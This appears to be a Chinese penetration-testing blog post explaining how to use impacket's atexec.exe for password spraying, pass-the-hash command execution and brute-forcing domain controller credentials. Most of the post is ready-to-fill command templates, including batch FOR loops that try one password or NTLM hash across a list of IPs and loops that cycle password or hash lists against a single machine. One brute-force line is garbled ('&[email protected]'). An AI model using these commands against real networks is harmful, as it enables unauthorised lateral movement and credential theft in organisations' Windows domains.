使用atexec 进行喷洒攻击
2022-9-30 10:8:26 Author: Eightbit(查看原文) 阅读量:11 收藏

点击上方蓝字关注我们

使用atexec传递密码或hash

https://github.com/maaaaz/impacket-examples-windows

注意事项

atexec最好需要指定administrator用户

atexec首次执行需要执行两次

如下图所示:

第一次以普通管理员用户执行命令,失败。

第二次以administrator执行命令,成功建立连接,但是命令执行失败。

再次以administrator执行命令,成功,有回显。

单个传递密码

域环境下

atexec.exe <domain>/<username>:<password>@<ip> "<command>"

本地环境下

atexec.exe ./<username>:<password>@<ip> "<command>"

单个传递hash(ntlmhash)

域环境下

atexec.exe  -hashes :<hash> <domain>/<username>@<ip> "<command>"

本地环境下

atexec.exe  -hashes :<hash> ./<username>@<ip> "<command>"

批量传递密码

注意事项

如果写成批处理,那么%i需要变成%%i

(ips.txt)需要使用小括号包裹

DOS命令

dos命令除了变量以外不区分大小写,包括执行参数也不区分大小写。

批量尝试连接ipc$,连接成功后可以使用net use查看。

for /f %i in (<ips.txt>) do net use \\%i\ipc$ "<password>" /user:<username>

明文密码批量执行命令

FOR /F %i in (<ips.txt>) do atexec.exe ./<username>:<passwd>@%i "<command>"

hash批量执行命令

FOR /F %i in (<ips.txt>) do atexec.exe -hashes :<hash> ./<username>@%i "<command>"

爆破域控密码

指定密码或者hash去爆破指定机器

# 指定密码集
FOR /F %i in (<passswds.txt>) do atexec.exe ./<username>:&[email protected]<ip> "<command>"
# 指定hash集
FOR /F %i in (<hashs.txt>) do atexec.exe -hashes :%i ./<username>@<ip> "<command>"

Eightbit 致力于寻找一群热爱技术、热爱分享的大佬师傅们,组建一个简单的圈子。简单到在这个的圈子里大家没有任何利益,没有任何冲突,大家只有一个简单的夙愿,就是在一起交流交流技术,交流交流想法,一起开心的吹吹水就好。我们交流的内容主要在网络安全方向,包括但不限于web安全、内网渗透、免杀、逆向分析、二进制分析、移动逆向分析、安全竞赛等。不论你是大佬、还是一个憧憬进入网络安全圈子的新秀,大家在技术面前都是平等的,我们都可以一切交流学习。有想法的师傅们可以加入我们的交流群一起交流哦~

喜欢就点个在看再走吧

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5MTA3MjMxNA==&mid=2247487332&idx=1&sn=dd0fcef6f81d67089e18ea6952659dc0&chksm=cfd3b531f8a43c278d1b24e0e222cc52a6be6c2aff9ada4544de427f3e5fac4d018aa97b7f6c#rd
如有侵权请联系:admin#unsafe.sh